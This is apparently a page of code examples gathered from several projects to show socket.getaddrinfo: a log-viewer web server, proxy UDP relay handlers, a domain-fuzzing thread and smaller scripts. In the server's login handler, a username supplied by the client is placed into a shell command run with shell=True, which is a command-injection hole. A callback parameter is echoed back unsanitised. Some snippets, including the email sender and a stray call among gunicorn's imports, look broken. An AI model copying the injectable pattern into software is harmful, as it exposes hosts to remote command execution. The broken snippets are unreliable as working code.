            return retval

        def delete_session(self):
            cookie = self.headers.get(HTTP_HEADER.COOKIE)

            if cookie:
                match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        del SESSIONS[session]

        def version_string(self):
            return "%s/%s" % (NAME, self._version())

        def end_headers(self):
            if not hasattr(self, "_headers_ended"):
                _BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
                self._headers_ended = True

        def log_message(self, format, *args):
            return

        def finish(self):
            try:
                _BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

        def _version(self):
            version = VERSION

            try:
                for line in open(os.path.join(os.path.dirname(__file__), "settings.py"), 'r'):
                    match = re.search(r'VERSION = "([^"]*)', line)
                    if match:
                        version = match.group(1)
                        break
            except:
                pass

            return version

        def _statics(self):
            latest = max(glob.glob(os.path.join(os.path.dirname(__file__), "..", "trails", "static", "malware", "*.txt")), key=os.path.getmtime)
            return "/%s" % datetime.datetime.fromtimestamp(os.path.getmtime(latest)).strftime(DATE_FORMAT)

        def _logo(self):
            if config.HEADER_LOGO:
                retval = config.HEADER_LOGO
            else:
                retval = '<img src="images/mlogo.png" style="width: 25px">altrail'

            return retval

        def _format(self, content, **params):
            if content:
                for key, value in params.items():
                    content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING))

            return content

        def _login(self, params):
            valid = False

            if params.get("username") and params.get("hash") and params.get("nonce"):
                if params.get("nonce") not in DISPOSED_NONCES:
                    DISPOSED_NONCES.add(params.get("nonce"))
                    for entry in (config.USERS or []):
                        entry = re.sub(r"\s", "", entry)
                        username, stored_hash, uid, netfilter = entry.split(':')

                        try:
                            uid = int(uid)
                        except ValueError:
                            uid = None

                        if username == params.get("username"):
                            try:
                                if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest():
                                    valid = True
                                    break
                            except:
                                if config.SHOW_DEBUG:
                                    traceback.print_exc()

            if valid:
                _ = os.urandom(SESSION_ID_LENGTH)
                session_id = _.hex() if hasattr(_, "hex") else _.encode("hex")
                expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS

                self.send_response(_http_client.OK)
                self.send_header(HTTP_HEADER.CONNECTION, "close")

                cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
                if config.USE_SSL:
                    cookie += "; Secure"
                if SESSION_COOKIE_FLAG_SAMESITE:
                    cookie += "; SameSite=strict"
                self.send_header(HTTP_HEADER.SET_COOKIE, cookie)

                if netfilter in ("", '*', "::", "0.0.0.0/0"):
                    netfilters = None
                else:
                    addresses = set()
                    netmasks = set()

                    for item in set(re.split(r"[;,]", netfilter)):
                        item = item.strip()
                        if '/' in item:
                            _ = item.split('/')[-1]
                            if _.isdigit() and int(_) >= 16:
                                lower = addr_to_int(item.split('/')[0])
                                mask = make_mask(int(_))
                                upper = lower | (0xffffffff ^ mask)
                                while lower <= upper:
                                    addresses.add(int_to_addr(lower))
                                    lower += 1
                            else:
                                netmasks.add(item)
                        elif '-' in item:
                            _ = item.split('-')
                            lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
                            while lower <= upper:
                                addresses.add(int_to_addr(lower))
                                lower += 1
                        elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
                            addresses.add(item)

                    netfilters = netmasks
                    if addresses:
                        netfilters.add(get_regex(addresses))

                SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]})
            else:
                time.sleep(UNAUTHORIZED_SLEEP_TIME)
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")

            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            content = "Login %s" % ("success" if valid else "failed")

            if not IS_WIN:
                try:
                    subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
                except Exception:
                    if config.SHOW_DEBUG:
                        traceback.print_exc()

            return content

        def _logout(self, params):
            self.delete_session()
            self.send_response(_http_client.FOUND)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.LOCATION, "/")

        def _whoami(self, params):
            session = self.get_session()
            username = session.username if session else ""

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return username

        def _check_ip(self, params):
            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            try:
                result_worst = worst_asns(params.get("address"))
                if result_worst:
                    result_ipcat = result_worst
                else:
                    _ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
                    result_ipcat = _[1] if _[0] == 'the' else _[0]
                return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

        def _trails(self, params):
            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return open(config.TRAILS_FILE, "rb").read()

        def _ping(self, params):
            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return PING_RESPONSE

        def _events(self, params):
            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            start, end, size, total = None, None, -1, None
            content = None
            log_exists = False
            dates = params.get("date", "")

            if ".." in dates:
                pass
            elif '_' not in dates:
                try:
                    date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
                    event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
                    if os.path.exists(event_log_path):
                        range_handle = open(event_log_path, "rb")
                        log_exists = True
                except ValueError:
                    print("[!] invalid date format in request")
                    log_exists = False
            else:
                logs_data = ""
                date_interval = dates.split("_", 1)
                try:
                    start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
                    end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
                    for i in xrange(int((end_date - start_date).days) + 1):
                        date = start_date + datetime.timedelta(i)
                        event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
                        if os.path.exists(event_log_path):
                            log_handle = open(event_log_path, "rb")
                            logs_data += log_handle.read()
                            log_handle.close()

                    range_handle = io.BytesIO(logs_data)
                    log_exists = True
                except ValueError:
                    print("[!] invalid date format in request")
                    log_exists = False

            if log_exists:
                range_handle.seek(0, 2)
                total = range_handle.tell()
                range_handle.seek(0)

                if self.headers.get(HTTP_HEADER.RANGE):
                    match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
                    if match:
                        start, end = int(match.group(1)), int(match.group(2))
                        max_size = end - start + 1
                        end = min(total - 1, end)
                        size = end - start + 1

                        if start == 0 or not session.range_handle:
                            session.range_handle = range_handle

                        if session.netfilters is None and not session.mask_custom:
                            session.range_handle.seek(start)
                            self.send_response(_http_client.PARTIAL_CONTENT)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
                            content = session.range_handle.read(size)
                        else:
                            self.send_response(_http_client.OK)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

                            buffer, addresses, netmasks, regex = io.StringIO(), set(), [], ""
                            for netfilter in session.netfilters or []:
                                if not netfilter:
                                    continue
                                if '/' in netfilter:
                                    netmasks.append(netfilter)
                                elif re.search(r"\A[\d.]+\Z", netfilter):
                                    addresses.add(netfilter)
                                elif "\\." in netfilter:
                                    regex = r"\b(%s)\b" % netfilter
                                else:
                                    print("[!] invalid network filter '%s'" % netfilter)
                                    return

                            for line in session.range_handle:
                                display = session.netfilters is None
                                ip = None
                                line = line.decode(UNICODE_ENCODING, "ignore")

                                if regex:
                                    match = re.search(regex, line)
                                    if match:
                                        ip = match.group(1)
                                        display = True

                                if not display and (addresses or netmasks):
                                    for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
                                        if not display:
                                            ip = match.group(1)
                                        else:
                                            break

                                        if ip in addresses:
                                            display = True
                                            break
                                        elif netmasks:
                                            for _ in netmasks:
                                                prefix, mask = _.split('/')
                                                if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
                                                    addresses.add(ip)
                                                    display = True
                                                    break

                                if session.mask_custom and "(custom)" in line:
                                    line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line)

                                if display:
                                    if ",%s" % ip in line or "%s," % ip in line:
                                        line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
                                    buffer.write(line)
                                    if buffer.tell() >= max_size:
                                        break

                            content = buffer.getvalue()
                            end = start + len(content) - 1
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))

                        if len(content) < max_size:
                            session.range_handle.close()
                            session.range_handle = None

                if size == -1:
                    self.send_response(_http_client.OK)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                    self.end_headers()

                    with range_handle as f:
                        while True:
                            data = f.read(io.DEFAULT_BUFFER_SIZE)
                            if not data:
                                break
                            else:
                                self.wfile.write(data)

            else:
                self.send_response(_http_client.OK)  # instead of _http_client.NO_CONTENT (compatibility reasons)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                if self.headers.get(HTTP_HEADER.RANGE):
                    self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")

            return content

        def _counts(self, params):
            counts = {}

            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")

            match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
            if match:
                min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                min_ = datetime.datetime.fromtimestamp(0)

            match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
            if match:
                max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                max_ = datetime.datetime.now()

            min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
            max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)

            for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
                filename = os.path.basename(filepath)
                if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
                    continue
                try:
                    current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
                except:
                    if config.SHOW_DEBUG:
                        traceback.print_exc()
                else:
                    if min_ <= current <= max_:
                        timestamp = int(time.mktime(current.timetuple()))
                        size = os.path.getsize(filepath)
                        with open(filepath, "rb") as f:
                            content = f.read(io.DEFAULT_BUFFER_SIZE)
                            if size >= io.DEFAULT_BUFFER_SIZE:
                                total = 1.0 * content.count(b'\n') * size / io.DEFAULT_BUFFER_SIZE
                                counts[timestamp] = int(round(total / 100) * 100)
                            else:
                                counts[timestamp] = content.count(b'\n')

            return json.dumps(counts)

    class SSLReqHandler(ReqHandler):
        def setup(self):
            self.connection = self.request
            self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
            self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)

    # IPv6 support
    if ':' in (address or ""):
        address = address.strip("[]")

        _BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6

        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV

        _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
    else:
        _address = (address or '', int(port) if str(port or "").isdigit() else 0)

    try:
        if pem:
            server = SSLThreadingServer(_address, pem, SSLReqHandler)
        else:
            server = ThreadingServer(_address, ReqHandler)
    except Exception as ex:
        if "Address already in use" in str(ex):
            exit("[!] another instance already running")
        elif "Name or service not known" in str(ex):
            exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
        elif "Cannot assign requested address" in str(ex):
            exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
        else:
            raise

    print("[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1]))

    print("[o] running...")

    if join:
        server.serve_forever()
    else:
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
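The IPv6 branch above resolves an address that is already a literal, so it passes AI_NUMERICHOST (plus AI_NUMERICSERV where available) to make getaddrinfo() fail fast instead of consulting DNS; a minimal sketch of that call in isolation, with an arbitrary loopback address and port:

import socket

_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV

# succeeds immediately for numeric literals; raises socket.gaierror if the
# host would need an actual DNS lookup
sockaddr = socket.getaddrinfo("::1", 8338, 0, 0, 0, _NUMERIC_ONLY)[0][4]
print(sockaddr)  # ('::1', 8338, 0, 0)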
Example #41
0
File: udprelay.py Project: able8/ss
    def _handle_server(self):
        server = self._server_socket
        data, r_addr = server.recvfrom(BUF_SIZE)
        if not data:
            logging.debug('UDP handle_server: data is empty')
        if self._is_local:
            frag = common.ord(data[2])
            if frag != 0:
                logging.warn('drop a message since frag is not 0')
                common.error_to_file('drop a message since frag is not 0',self._config)
                return
            else:
                data = data[3:]
        else:
            # decrypt data
            data = encrypt.encrypt_all(self._password, self._method, 0, data)
            if not data:
                logging.debug('UDP handle_server: data is empty after decrypt')
                return
        header_result = parse_header(data,self._config)
        if header_result is None:
            return
        addrtype, dest_addr, dest_port, header_length = header_result

        if self._is_local:
            server_addr, server_port = self._get_a_server()
        else:
            server_addr, server_port = dest_addr, dest_port

        addrs = self._dns_cache.get(server_addr, None)
        if addrs is None:
            addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                       socket.SOCK_DGRAM, socket.SOL_UDP)
            if not addrs:
                # drop
                return
            else:
                self._dns_cache[server_addr] = addrs

        af, socktype, proto, canonname, sa = addrs[0]
        key = client_key(r_addr, af)

        client = self._cache.get(key, None)
        if not client:
            # TODO async getaddrinfo
            if self._forbidden_iplist:
                if common.to_str(sa[0]) in self._forbidden_iplist:
                    logging.debug('IP %s is in forbidden list, drop' %
                                  common.to_str(sa[0]))
                    # drop
                    return
            client = socket.socket(af, socktype, proto)
            client.setblocking(False)
            self._cache[key] = client
            self._client_fd_to_server_addr[client.fileno()] = r_addr

            self._sockets.add(client.fileno())
            self._eventloop.add(client, eventloop.POLL_IN, self)
        if self._stat_callback:
            self._stat_callback(self._listen_port, len(data))
        if self._is_local:
            data = encrypt.encrypt_all(self._password, self._method, 1, data)
            if not data:
                return
        else:
            data = data[header_length:]
        if not data:
            return
        try:
            client.sendto(data, (server_addr, server_port))
            if not self._is_local:
                if self._config.has_key('port_limit') and self._config['port_limit'] != "" and os.path.exists(self._config['port_limit']):
                    port_limits = json.loads(open(self._config['port_limit']).read())
                    if str(self._listen_port) in port_limits:
                        port_limits['%s' % self._listen_port]['used'] = port_limits['%s' % self._listen_port]['used'] + len(data) + BUF_SIZE
                        open('%s' % self._config['port_limit'],"w").write("%s" % json.dumps(port_limits,indent=4,ensure_ascii=False,sort_keys=True))
        except IOError as e:
            err = eventloop.errno_from_exception(e)
            if err in (errno.EINPROGRESS, errno.EAGAIN):
                pass
            else:
                shell.print_exception(e)
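The _dns_cache lookup above is essentially memoised getaddrinfo() for UDP targets; a hedged sketch of the same idea with a plain dict (names are illustrative, not from the project):

import socket

_dns_cache = {}

def resolve_udp(server_addr, server_port):
    addrs = _dns_cache.get(server_addr)
    if addrs is None:
        addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                   socket.SOCK_DGRAM, socket.SOL_UDP)
        if addrs:
            _dns_cache[server_addr] = addrs
    # first result: (family, socktype, proto, canonname, sockaddr)
    return addrs[0] if addrs else None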
Example #42
0
#!usr/bin/python3
import firebirdsql as fb
import xlrd
import pandas as pd
import socket
from contextlib import closing
from datetime import datetime

socket.getaddrinfo('localhost', 8080)
con = fb.connect(host='localhost',
                 database='path to the database',
                 user='******',
                 password='******')
NFCe = pd.read_excel('path to the Excel file')
log = open('path to the output txt file', 'w')

cur = con.cursor()
# variables that hold the Excel spreadsheet columns
excel_Num = NFCe['Numero']
excel_Situacao = NFCe['Situacao']
excel_data = NFCe['Data_Emissao']
excel_chave = NFCe['Chave_Acesso']
excel_valor = NFCe['Valor N.F.']
excel_chave_edit = []
listNFCE = excel_Num.tolist()
cont = 0
cupons_existentes = []
notas_nulas = []
CHV_NFCE = []
VALOR = []
DESCTO = []
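The bare socket.getaddrinfo('localhost', 8080) call above only resolves the name; if the intent is to check that the service is actually reachable before connecting, a hedged sketch using contextlib.closing (which the script already imports) could look like this (the helper name and timeout are assumptions):

import socket
from contextlib import closing

def port_open(host='localhost', port=8080, timeout=2):
    try:
        with closing(socket.create_connection((host, port), timeout=timeout)):
            return True
    except OSError:
        return False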
Example #43
0
    def _handle_server_dns_resolved(self, remote_addr, addrs, server_addr,
                                    dns_resolved, data, r_addr, uid,
                                    header_length, is_relay):
        if uid is None:
            user_id = self._listen_port
        else:
            user_id = uid
        try:
            server_port = remote_addr[1]
            if addrs is None:
                addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                           socket.SOCK_DGRAM, socket.SOL_UDP)
            if not addrs:  # drop
                return
            af, socktype, proto, canonname, sa = addrs[0]
            server_addr = sa[0]
            key = client_key(r_addr, af)
            client_pair = self._cache.get(key, None)
            if client_pair is None:
                client_pair = self._cache_dns_client.get(key, None)
            if client_pair is None:
                if self._forbidden_iplist:
                    if common.to_str(sa[0]) in self._forbidden_iplist:
                        logging.debug('IP %s is in forbidden list, drop' %
                                      common.to_str(sa[0]))
                        # drop
                        return
                if self._forbidden_portset:
                    if sa[1] in self._forbidden_portset:
                        logging.debug('Port %d is in forbidden list, reject' %
                                      sa[1])
                        # drop
                        return
                client = socket.socket(af, socktype, proto)
                client_uid = uid
                client.setblocking(False)
                self._socket_bind_addr(client, af, is_relay)
                is_dns = False
                if len(data) > header_length + 13 and data[
                        header_length + 4:header_length +
                        12] == b"\x00\x01\x00\x00\x00\x00\x00\x00":
                    is_dns = True
                else:
                    pass
                if sa[1] == 53 and is_dns:  #DNS
                    logging.debug("DNS query %s from %s:%d" %
                                  (common.to_str(sa[0]), r_addr[0], r_addr[1]))
                    self._cache_dns_client[key] = (client, uid)
                else:
                    self._cache[key] = (client, uid)
                self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)

                self._sockets.add(client.fileno())
                self._eventloop.add(client, eventloop.POLL_IN, self)

                logging.debug('UDP port %5d sockets %d' %
                              (self._listen_port, len(self._sockets)))

                if not self.is_pushing_detect_text_list:
                    for id in self.detect_text_list:
                        if common.match_regex(
                                self.detect_text_list[id]['regex'],
                                common.to_str(data)):
                            if self._config['is_multi_user'] != 0 and uid != 0:
                                if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[
                                        uid]:
                                    self.mu_detect_log_list[uid].append(id)
                            else:
                                if self.is_cleaning_detect_log == False and id not in self.detect_log_list:
                                    self.detect_log_list.append(id)
                            raise Exception(
                                'This connection matched regex id %d and was rejected, regex: %s, connecting %s:%d from %s:%d via port %d'
                                % (self.detect_text_list[id]['id'],
                                   self.detect_text_list[id]['regex'],
                                   common.to_str(server_addr), server_port,
                                   r_addr[0], r_addr[1], self._listen_port))
                if not self.is_pushing_detect_hex_list:
                    for id in self.detect_hex_list:
                        if common.match_regex(
                                self.detect_hex_list[id]['regex'],
                                binascii.hexlify(data)):
                            if self._config['is_multi_user'] != 0 and uid != 0:
                                if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[
                                        uid]:
                                    self.mu_detect_log_list[uid].append(id)
                            else:
                                if self.is_cleaning_detect_log == False and id not in self.detect_log_list:
                                    self.detect_log_list.append(id)
                            raise Exception(
                                'This connection matched regex id %d and was rejected, regex: %s, connecting %s:%d from %s:%d via port %d'
                                % (self.detect_hex_list[id]['id'],
                                   self.detect_hex_list[id]['regex'],
                                   common.to_str(server_addr), server_port,
                                   r_addr[0], r_addr[1], self._listen_port))
                if not self._connect_hex_data:
                    common.connect_log(
                        'UDP data to %s:%d from %s:%d via port %d' %
                        (common.to_str(server_addr), server_port, r_addr[0],
                         r_addr[1], self._listen_port))
                else:
                    common.connect_log(
                        'UDP data to %s:%d from %s:%d via port %d,hex data : %s'
                        %
                        (common.to_str(server_addr), server_port, r_addr[0],
                         r_addr[1], self._listen_port, binascii.hexlify(data)))
                if self._config['is_multi_user'] != 2:
                    if common.to_str(
                            r_addr[0]
                    ) in self.wrong_iplist and r_addr[
                            0] != 0 and self.is_cleaning_wrong_iplist == False:
                        del self.wrong_iplist[common.to_str(r_addr[0])]
                    if common.get_ip_md5(
                            r_addr[0], self._config['ip_md5_salt']
                    ) not in self.connected_iplist and r_addr[
                            0] != 0 and self.is_cleaning_connected_iplist == False:
                        self.connected_iplist.append(
                            common.get_ip_md5(r_addr[0],
                                              self._config['ip_md5_salt']))
            else:
                client, client_uid = client_pair
            self._cache.clear(self._udp_cache_size)
            self._cache_dns_client.clear(16)

            if self._is_local:
                ref_iv = [encrypt.encrypt_new_iv(self._method)]
                self._protocol.obfs.server_info.iv = ref_iv[0]
                data = self._protocol.client_udp_pre_encrypt(data)
                #logging.debug("%s" % (binascii.hexlify(data),))
                data = encrypt.encrypt_all_iv(
                    self._protocol.obfs.server_info.key, self._method, 1, data,
                    ref_iv)
                if not data:
                    return
            else:
                data = data[header_length:]
            if not data:
                return
        except Exception as e:
            shell.print_exception(e)
            logging.error("exception from user %d" % (uid, ))

        try:
            client.sendto(data, (server_addr, server_port))
            self.add_transfer_u(client_uid, len(data))
            if client_pair is None:  # new request
                addr, port = client.getsockname()[:2]
                common.connect_log(
                    'UDP data to %s(%s):%d from %s:%d by user %d' %
                    (common.to_str(remote_addr[0]), common.to_str(server_addr),
                     server_port, addr, port, user_id))
        except IOError as e:
            err = eventloop.errno_from_exception(e)
            logging.warning('IOError sendto %s:%d by user %d' %
                            (server_addr, server_port, user_id))
            if err in (errno.EINPROGRESS, errno.EAGAIN):
                pass
            else:
                shell.print_exception(e)
Example #44
0
import smtplib
import socket
from email.mime.text import MIMEText

def send_email():
    msg = MIMEText('Hello Santhosh')
    # resolve the SMTP host up front (the result is not used here)
    socket.getaddrinfo('smtp.mail.google.com', 8080)
    s = smtplib.SMTP('smtp.mail.google.com')
    s.sendmail(msg['*****@*****.**'], msg['*****@*****.**'], msg.as_string())
    s.quit()
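For comparison, a minimal working sketch of the same send with explicit headers; the sender and recipient addresses are hypothetical placeholders, since the originals are redacted above, and a local SMTP relay is assumed:

import smtplib
from email.mime.text import MIMEText

def send_email_sketch():
    sender = 'sender@example.com'        # hypothetical placeholder
    recipient = 'recipient@example.com'  # hypothetical placeholder
    msg = MIMEText('Hello Santhosh')
    msg['Subject'] = 'Hello'
    msg['From'] = sender
    msg['To'] = recipient
    with smtplib.SMTP('localhost', 25) as s:  # assumes a local SMTP relay
        s.send_message(msg)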
Example #45
0
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.

import errno
import os
import socket
socket.getaddrinfo('localhost', 25)
import stat
import sys
import time

from gunicorn import util


class BaseSocket(object):
    def __init__(self, address, conf, log, fd=None):
        self.log = log
        self.conf = conf

        self.cfg_addr = address
        if fd is None:
            sock = socket.socket(self.FAMILY, socket.SOCK_STREAM)
            bound = False
        else:
            sock = socket.fromfd(fd, self.FAMILY, socket.SOCK_STREAM)
            os.close(fd)
            bound = True

        self.sock = self.set_options(sock, bound=bound)
Example #46
0
    def run(self):
        while not self.kill_received:
            try:
                domain = self.jobs.get(block=False)
            except queue.Empty:
                self.kill_received = True
                return

            domain['domain-name'] = domain['domain-name'].encode(
                'idna').decode()

            if self.option_extdns:
                if self.nameservers:
                    resolv = dns.resolver.Resolver(configure=False)
                    resolv.nameservers = self.nameservers
                else:
                    resolv = dns.resolver.Resolver()

                resolv.lifetime = REQUEST_TIMEOUT_DNS * REQUEST_RETRIES_DNS
                resolv.timeout = REQUEST_TIMEOUT_DNS

                nxdomain = False
                dns_ns = False
                dns_a = False
                dns_aaaa = False
                dns_mx = False

                try:
                    domain['dns-ns'] = self.__answer_to_list(
                        resolv.query(domain['domain-name'],
                                     rdtype=dns.rdatatype.NS))
                    dns_ns = True
                except dns.resolver.NXDOMAIN:
                    nxdomain = True
                    pass
                except dns.resolver.NoNameservers:
                    domain['dns-ns'] = ['!ServFail']
                    pass
                except DNSException:
                    pass

                if nxdomain is False:
                    try:
                        domain['dns-a'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.A))
                        dns_a = True
                    except dns.resolver.NoNameservers:
                        domain['dns-a'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass

                    try:
                        domain['dns-aaaa'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.AAAA))
                        dns_aaaa = True
                    except dns.resolver.NoNameservers:
                        domain['dns-aaaa'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass

                if nxdomain is False and dns_ns is True:
                    try:
                        domain['dns-mx'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.MX))
                        dns_mx = True
                    except dns.resolver.NoNameservers:
                        domain['dns-mx'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass
            else:
                try:
                    ip = socket.getaddrinfo(domain['domain-name'], 80)
                except socket.gaierror as e:
                    if e.errno == -3:
                        domain['dns-a'] = ['!ServFail']
                    pass
                except Exception:
                    pass
                else:
                    domain['dns-a'] = list()
                    domain['dns-aaaa'] = list()
                    for j in ip:
                        if '.' in j[4][0]:
                            domain['dns-a'].append(j[4][0])
                        if ':' in j[4][0]:
                            domain['dns-aaaa'].append(j[4][0])
                    domain['dns-a'] = sorted(domain['dns-a'])
                    domain['dns-aaaa'] = sorted(domain['dns-aaaa'])
                    dns_a = True
                    dns_aaaa = True

            if self.option_mxcheck:
                if dns_mx is True:
                    if domain['domain-name'] != self.domain_init:
                        if self.__mxcheck(domain['dns-mx'][0],
                                          self.domain_init,
                                          domain['domain-name']):
                            domain['mx-spy'] = True

            if self.option_geoip:
                if dns_a is True:
                    try:
                        country = GeoIP.new(
                            GeoIP.GEOIP_MEMORY_CACHE).country_name_by_addr(
                                domain['dns-a'][0])
                    except Exception:
                        pass
                    else:
                        if country:
                            domain['geoip-country'] = country.split(',')[0]

            if self.option_banners:
                if dns_a is True:
                    banner = self.__banner_http(domain['dns-a'][0],
                                                domain['domain-name'])
                    if banner:
                        domain['banner-http'] = banner
                if dns_mx is True:
                    banner = self.__banner_smtp(domain['dns-mx'][0])
                    if banner:
                        domain['banner-smtp'] = banner

            if self.option_ssdeep:
                if dns_a is True or dns_aaaa is True:
                    try:
                        req = requests.get(
                            self.uri_scheme + '://' + domain['domain-name'] +
                            self.uri_path + self.uri_query,
                            timeout=REQUEST_TIMEOUT_HTTP,
                            headers={'User-Agent': self.useragent},
                            verify=False)
                    except Exception:
                        pass
                    else:
                        if req.status_code // 100 == 2 and req.url.split(
                                '?')[0] != self.ssdeep_effective_url:
                            ssdeep_curr = ssdeep.hash(''.join(
                                req.text.split()).lower())
                            domain['ssdeep-score'] = ssdeep.compare(
                                self.ssdeep_init, ssdeep_curr)

            domain['domain-name'] = domain['domain-name'].encode().decode(
                'idna')
            self.jobs.task_done()
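The fallback branch above sorts getaddrinfo() results into A and AAAA lists by looking for '.' or ':' in the address string; a minimal sketch of the same idea keyed on the address family instead (the function name and default port are illustrative, not from the original):

import socket

def resolve_v4_v6(name, port=80):
    # Collect unique IPv4 and IPv6 addresses for a host name.
    v4, v6 = set(), set()
    for family, _type, _proto, _canon, sockaddr in socket.getaddrinfo(name, port):
        if family == socket.AF_INET:
            v4.add(sockaddr[0])
        elif family == socket.AF_INET6:
            v6.add(sockaddr[0])
    return sorted(v4), sorted(v6)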
Example #47
0
def get_cookie():
    log("Cookie", "new connection cookie value (authentication) ...")

    # sets the "initial" socket reference as invalid
    # this is considered the default behavior
    _socket = None

